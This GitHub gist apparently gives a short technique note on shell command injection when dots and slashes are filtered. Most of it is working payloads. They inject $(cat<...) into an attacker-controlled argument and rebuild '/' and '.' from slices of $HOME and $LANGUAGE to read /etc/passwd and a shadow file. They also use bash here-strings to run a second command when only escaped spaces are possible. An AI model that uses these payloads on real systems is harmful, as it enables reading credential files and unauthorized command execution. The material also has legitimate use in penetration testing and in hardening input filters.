pastcompute/gist:145b18f876d16950adeafb39d91e8c6b

Last active April 7, 2024 11:22

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Select an option

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/pastcompute/145b18f876d16950adeafb39d91e8c6b.js"></script>
Save pastcompute/145b18f876d16950adeafb39d91e8c6b to your computer and use it in GitHub Desktop.

How to access arbitrary file when you can't inject a dot or forward slash

Raw

bash -c ‘/path/to/some/binary args_not_attacker_controlled attacker_controlled$(cat<${HOME:0:1}etc${HOME:0:1}passwd)'

bash -c '/path/to/some/binary args_not_attacker_controlled attacker_controlled$(cat<${HOME:0:1}etc${HOME:0:1}apt${HOME:0:1}${LANGUAGE:5:1}${LANGUAGE:5:1}${HOME:0:1}shadow)'

Use triple arrow to redirect to bash if you can get an escaped space but not a direct space

bash -c '/bin/echo somestrangefile$(bash<<<"echo ABC")'

This fails, because the escaped space is considered part of the 'word' by bash and it tries to run a command called echo ABC

bash -c '/bin/echo somestrangefile$(bash<<<"echo\ ABC")'

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

pastcompute/gist:145b18f876d16950adeafb39d91e8c6b

Select an option

No results found

Select an option

No results found